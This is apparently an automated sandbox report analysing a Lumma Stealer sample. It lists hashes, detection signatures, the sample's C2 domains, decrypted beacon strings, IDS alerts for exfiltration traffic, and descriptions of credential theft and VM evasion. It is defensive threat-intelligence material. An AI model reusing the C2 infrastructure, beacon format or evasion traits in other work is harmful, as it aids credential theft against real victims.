Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uUtgy7BbF1.exe

Overview

General Information

Sample name:uUtgy7BbF1.exe
renamed because original name is a hash value
Original sample name:425be48f2d7cc72615c4cdfda5341832.exe
Analysis ID:1581192
MD5:425be48f2d7cc72615c4cdfda5341832
SHA1:093d262086312a5f86ec903ea321cfbe0d3bb4fe
SHA256:4c55b2bc8fb77aaaf71552039073386e76cce6ee45fee54d2c8fd84aba97d691
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • uUtgy7BbF1.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\uUtgy7BbF1.exe" MD5: 425BE48F2D7CC72615C4CDFDA5341832)
    • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • uUtgy7BbF1.exe (PID: 7580 cmdline: "C:\Users\user\Desktop\uUtgy7BbF1.exe" MD5: 425BE48F2D7CC72615C4CDFDA5341832)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["curverpluch.lat", "shapestickyr.lat", "bashfulacid.lat", "slipperyloo.lat", "talkynicer.lat", "tentabatte.lat", "wordyfindy.lat", "manyrestro.lat", "volcanohushe.click"], "Build id": "pqZnKP--c3Rld3dz"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000003.1481155531.00000000011C5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.1480945277.00000000011C4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.1480812391.00000000011C4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: uUtgy7BbF1.exe PID: 7580JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: uUtgy7BbF1.exe PID: 7580JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 3 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:15:06.163000+010020283713Unknown Traffic192.168.2.949707104.21.71.155443TCP
                2024-12-27T08:15:08.351844+010020283713Unknown Traffic192.168.2.949708104.21.71.155443TCP
                2024-12-27T08:15:10.869660+010020283713Unknown Traffic192.168.2.949719104.21.71.155443TCP
                2024-12-27T08:15:13.916099+010020283713Unknown Traffic192.168.2.949725104.21.71.155443TCP
                2024-12-27T08:15:16.622137+010020283713Unknown Traffic192.168.2.949731104.21.71.155443TCP
                2024-12-27T08:15:19.857325+010020283713Unknown Traffic192.168.2.949742104.21.71.155443TCP
                2024-12-27T08:15:22.743964+010020283713Unknown Traffic192.168.2.949750104.21.71.155443TCP
                2024-12-27T08:15:26.672861+010020283713Unknown Traffic192.168.2.949758104.21.71.155443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:15:06.908362+010020546531A Network Trojan was detected192.168.2.949707104.21.71.155443TCP
                2024-12-27T08:15:09.131944+010020546531A Network Trojan was detected192.168.2.949708104.21.71.155443TCP
                2024-12-27T08:15:27.536196+010020546531A Network Trojan was detected192.168.2.949758104.21.71.155443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:15:06.908362+010020498361A Network Trojan was detected192.168.2.949707104.21.71.155443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:15:09.131944+010020498121A Network Trojan was detected192.168.2.949708104.21.71.155443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:15:06.163000+010020585351Domain Observed Used for C2 Detected192.168.2.949707104.21.71.155443TCP
                2024-12-27T08:15:08.351844+010020585351Domain Observed Used for C2 Detected192.168.2.949708104.21.71.155443TCP
                2024-12-27T08:15:10.869660+010020585351Domain Observed Used for C2 Detected192.168.2.949719104.21.71.155443TCP
                2024-12-27T08:15:13.916099+010020585351Domain Observed Used for C2 Detected192.168.2.949725104.21.71.155443TCP
                2024-12-27T08:15:16.622137+010020585351Domain Observed Used for C2 Detected192.168.2.949731104.21.71.155443TCP
                2024-12-27T08:15:19.857325+010020585351Domain Observed Used for C2 Detected192.168.2.949742104.21.71.155443TCP
                2024-12-27T08:15:22.743964+010020585351Domain Observed Used for C2 Detected192.168.2.949750104.21.71.155443TCP
                2024-12-27T08:15:26.672861+010020585351Domain Observed Used for C2 Detected192.168.2.949758104.21.71.155443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:15:04.525486+010020585341Domain Observed Used for C2 Detected192.168.2.9556871.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:15:18.188581+010020480941Malware Command and Control Activity Detected192.168.2.949731104.21.71.155443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:15:22.750164+010028438641A Network Trojan was detected192.168.2.949750104.21.71.155443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://volcanohushe.click/TAvira URL Cloud: Label: malware
                Source: https://volcanohushe.click/Avira URL Cloud: Label: malware
                Source: https://volcanohushe.click/apiNAAvira URL Cloud: Label: malware
                Source: https://volcanohushe.click/apiNDAvira URL Cloud: Label: malware
                Source: https://volcanohushe.click/apiAvira URL Cloud: Label: malware
                Source: https://volcanohushe.click:443/apiCLSIDAvira URL Cloud: Label: malware
                Source: https://volcanohushe.click/apipAvira URL Cloud: Label: malware
                Source: volcanohushe.clickAvira URL Cloud: Label: malware
                Source: https://volcanohushe.click/apisAvira URL Cloud: Label: malware
                Source: https://volcanohushe.click/NDAvira URL Cloud: Label: malware
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["curverpluch.lat", "shapestickyr.lat", "bashfulacid.lat", "slipperyloo.lat", "talkynicer.lat", "tentabatte.lat", "wordyfindy.lat", "manyrestro.lat", "volcanohushe.click"], "Build id": "pqZnKP--c3Rld3dz"}
                Source: uUtgy7BbF1.exeVirustotal: Detection: 69%Perma Link
                Source: uUtgy7BbF1.exeReversingLabs: Detection: 68%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.0% probability
                Source: uUtgy7BbF1.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: volcanohushe.click
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString decryptor: pqZnKP--c3Rld3dz
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00417745 CryptUnprotectData,3_2_00417745
                Source: uUtgy7BbF1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.9:49758 version: TLS 1.2
                Source: uUtgy7BbF1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_00690CF8 FindFirstFileExW,0_2_00690CF8
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_00690DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00690DA9
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00690CF8 FindFirstFileExW,3_2_00690CF8
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00690DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00690DA9
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h3_2_0042D0CD
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax]3_2_0040D11B
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov edi, eax3_2_0040D11B
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov edx, ecx3_2_00409400
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx-65h]3_2_0043D4E1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000278h]3_2_00417745
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov edx, eax3_2_00440770
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+4557D5DCh]3_2_004387D0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov ecx, eax3_2_00429070
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then xor ebx, ebx3_2_00429070
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov ebx, eax3_2_004058D0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov ebp, eax3_2_004058D0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h3_2_004158FC
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00416896
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]3_2_0042C89E
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042B8BD
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042B963
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx+04h]3_2_0040D907
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]3_2_00440180
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h3_2_0041598C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h3_2_00419190
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h3_2_00419190
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h3_2_00419190
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h3_2_00419190
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov edx, eax3_2_00419190
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h3_2_00419190
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 798ECF08h3_2_00419190
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h3_2_00419190
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00419190
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+06h]3_2_0041B9A0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-5C093193h]3_2_0041B25A
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov ecx, ebx3_2_00417A75
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov edx, eax3_2_00417207
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042B215
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then jmp ecx3_2_0043F286
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+18h]3_2_004142A0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov word ptr [edx], cx3_2_004142A0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-2DCF3881h]3_2_004142A0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov ecx, eax3_2_004142A0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00417AB8
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov dword ptr [esp], ecx3_2_0042BB60
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov dword ptr [esp], ecx3_2_0042BB66
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00402B70
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-00000098h]3_2_00421B00
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+02h]3_2_00421B00
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov ecx, eax3_2_0043DB10
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov ecx, eax3_2_0043D325
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_004163C0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+4EB33D1Fh]3_2_004163C0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+28h]3_2_004163C0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then test eax, eax3_2_004393D0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then push eax3_2_004393D0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_004073F0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_004073F0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0041A3A0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp word ptr [edi+ecx+02h], 0000h3_2_0040B3BB
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx-2Ch]3_2_0043E450
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]3_2_00440450
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov edx, eax3_2_00426430
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov eax, dword ptr [esi+28h]3_2_0040E49F
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov eax, dword ptr [0044A454h]3_2_0040C4AE
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042856C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov ecx, dword ptr [00446180h]3_2_00415506
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 120360DAh3_2_00415506
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00418DC5
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041D5B0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]3_2_0041864E
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00428630
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp cl, 0000002Eh3_2_00426639
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_00426639
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-1EB1B608h]3_2_0042963E
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+28h]3_2_00417EEE
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov edx, ecx3_2_00417EEE
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00429E80
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov edx, ecx3_2_00415E9A
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h3_2_00415E9A
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00415E9A
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00415E9A
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h3_2_00415E9A
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-098D4F7Eh]3_2_00415E9A
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0043CEA0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00409EB9
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then mov ecx, eax3_2_00418F52
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00435F00
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-1EB1B608h]3_2_0042963E
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx]3_2_0040AF23
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx ebx, byte ptr [ecx]3_2_0043F730
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_004167E1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then jmp eax3_2_00424F80
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebp-1EB1B624h]3_2_004257AC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058534 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (volcanohushe .click) : 192.168.2.9:55687 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058535 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI) : 192.168.2.9:49707 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2058535 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI) : 192.168.2.9:49708 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2058535 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI) : 192.168.2.9:49725 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2058535 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI) : 192.168.2.9:49731 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2058535 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI) : 192.168.2.9:49758 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2058535 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI) : 192.168.2.9:49719 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2058535 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI) : 192.168.2.9:49742 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2058535 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI) : 192.168.2.9:49750 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49731 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49708 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49708 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49758 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49750 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49707 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49707 -> 104.21.71.155:443
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: volcanohushe.click
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49707 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49708 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49725 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49731 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49758 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49719 -> 104.21.71.155:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49742 -> 104.21.71.155:443
